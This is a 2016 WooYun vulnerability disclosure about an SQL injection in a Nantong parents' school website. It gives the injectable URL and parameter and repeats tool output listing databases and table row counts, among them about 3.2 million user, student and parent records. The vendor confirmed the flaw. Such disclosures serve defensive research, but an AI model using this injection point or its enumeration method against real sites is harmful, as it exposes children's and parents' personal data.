当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187971

漏洞标题:南通市网上家长学校SQL注入大量可垮裤查询(涉及300w用户信息)

相关厂商:ntjxt.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-12 16:18

修复时间:2016-05-27 19:10

公开时间:2016-05-27 19:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

RT

详细说明:

注入点:http://www.ntjxt.com/areas?area_id=1


数据库

available databases [12]:
[*] COMMUNITY_ONLINE
[*] CTXSYS
[*] ESCHOOL30
[*] EXFSYS
[*] GATEWAY
[*] MDSYS
[*] OLAPSYS
[*] PARENTSCHOOL
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XUEXI6_PARENTSCHOOL



Database: PARENTSCHOOL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| SESSIONS | 11057339 |
| PAGE_RECORDS | 8907483 |
| ACTIVITY_MESSAGES | 1530992 |
| BLESSINGS | 962585 |
| BOOK_MESSAGES | 545177 |
| BOOK_ACTIVITIES | 333791 |
| LOTTERY_RECORDS | 89213 |
| ACTION_RECORDS | 85368 |
| FOCUS | 69882 |
| NEWS_LINES | 20725 |
| BOOK_EXCHANGES | 8830 |
| BOTTLE_USER_RELATIONS | 8596 |
| LINSHI | 8286 |
| PAPER_RESULTS | 5733 |
| AWARD_USER_RELATIONS | 5581 |
| BOTTLES | 4705 |
| BOOK_ACTIVITY_AWARDS | 3785 |
| QUEUE_MESSAGES | 1083 |
| QUESTIONS | 1060 |
| BOOK_AWARD_USERS | 887 |
| RESOURCES | 655 |
| SCHOOL_TYPES | 574 |
| SCHOOLS | 512 |
| AREA_NEWS | 493 |
| ARTICLES | 459 |
| BOOK_ARTICLES | 434 |
| BOOK_SETTINGS | 168 |
| LECTURE_COMMENTS | 134 |
| ARTICLE_COMMENTS | 113 |
| INDEX_SETTINGS | 86 |
| ACTIVITY_PICTURES | 74 |
| DANGERS | 68 |
| LOTTERY_SETTINGS | 61 |
| LECTURES | 52 |
| ACTIVITY_AWARDS | 36 |
| RESOURCE_TYPES | 27 |
| BEAUTIES | 23 |
| NEWS_TYPES | 23 |
| BOOK_LISTINGS | 16 |
| PAPER_OPTIONS | 10 |
| AREA_MANAGERS | 9 |
| SONGS | 8 |
| WAITING_MESSAGE_LOGS | 6 |
| PAPER_QUESTIONS | 3 |
| NOTICES | 2 |
| ACTIVITY_REPORTS | 1 |
| PAPERS | 1 |
+-----------------------+---------+


可垮裤查询数据库 300多w用户信息

Database: ESCHOOL30
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| GROUP_USER_RELATIONS | 3276581 |
| USERS | 3252938 |
| STUDENTS | 1577602 |
| PARENTS | 1565084 |
| SEND_SERVICE_RELATIONS | 333491 |
| TEACHERS | 89003 |
| WAITING_MESSAGES | 86689 |
| USER_GROUPS | 83326 |
| WAITING_MESSAGE_RECORDS | 7674 |
| SCHOOL_INFOS | 934 |
+-------------------------+---------+


漏洞证明:

注入点:http://www.ntjxt.com/areas?area_id=1


数据库

available databases [12]:
[*] COMMUNITY_ONLINE
[*] CTXSYS
[*] ESCHOOL30
[*] EXFSYS
[*] GATEWAY
[*] MDSYS
[*] OLAPSYS
[*] PARENTSCHOOL
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XUEXI6_PARENTSCHOOL



Database: PARENTSCHOOL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| SESSIONS | 11057339 |
| PAGE_RECORDS | 8907483 |
| ACTIVITY_MESSAGES | 1530992 |
| BLESSINGS | 962585 |
| BOOK_MESSAGES | 545177 |
| BOOK_ACTIVITIES | 333791 |
| LOTTERY_RECORDS | 89213 |
| ACTION_RECORDS | 85368 |
| FOCUS | 69882 |
| NEWS_LINES | 20725 |
| BOOK_EXCHANGES | 8830 |
| BOTTLE_USER_RELATIONS | 8596 |
| LINSHI | 8286 |
| PAPER_RESULTS | 5733 |
| AWARD_USER_RELATIONS | 5581 |
| BOTTLES | 4705 |
| BOOK_ACTIVITY_AWARDS | 3785 |
| QUEUE_MESSAGES | 1083 |
| QUESTIONS | 1060 |
| BOOK_AWARD_USERS | 887 |
| RESOURCES | 655 |
| SCHOOL_TYPES | 574 |
| SCHOOLS | 512 |
| AREA_NEWS | 493 |
| ARTICLES | 459 |
| BOOK_ARTICLES | 434 |
| BOOK_SETTINGS | 168 |
| LECTURE_COMMENTS | 134 |
| ARTICLE_COMMENTS | 113 |
| INDEX_SETTINGS | 86 |
| ACTIVITY_PICTURES | 74 |
| DANGERS | 68 |
| LOTTERY_SETTINGS | 61 |
| LECTURES | 52 |
| ACTIVITY_AWARDS | 36 |
| RESOURCE_TYPES | 27 |
| BEAUTIES | 23 |
| NEWS_TYPES | 23 |
| BOOK_LISTINGS | 16 |
| PAPER_OPTIONS | 10 |
| AREA_MANAGERS | 9 |
| SONGS | 8 |
| WAITING_MESSAGE_LOGS | 6 |
| PAPER_QUESTIONS | 3 |
| NOTICES | 2 |
| ACTIVITY_REPORTS | 1 |
| PAPERS | 1 |
+-----------------------+---------+


可垮裤查询数据库 300多w用户信息

Database: ESCHOOL30
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| GROUP_USER_RELATIONS | 3276581 |
| USERS | 3252938 |
| STUDENTS | 1577602 |
| PARENTS | 1565084 |
| SEND_SERVICE_RELATIONS | 333491 |
| TEACHERS | 89003 |
| WAITING_MESSAGES | 86689 |
| USER_GROUPS | 83326 |
| WAITING_MESSAGE_RECORDS | 7674 |
| SCHOOL_INFOS | 934 |
+-------------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-12 19:05

厂商回复:

部分信息由于2011年就不维护了,确实有漏洞

最新状态:

暂无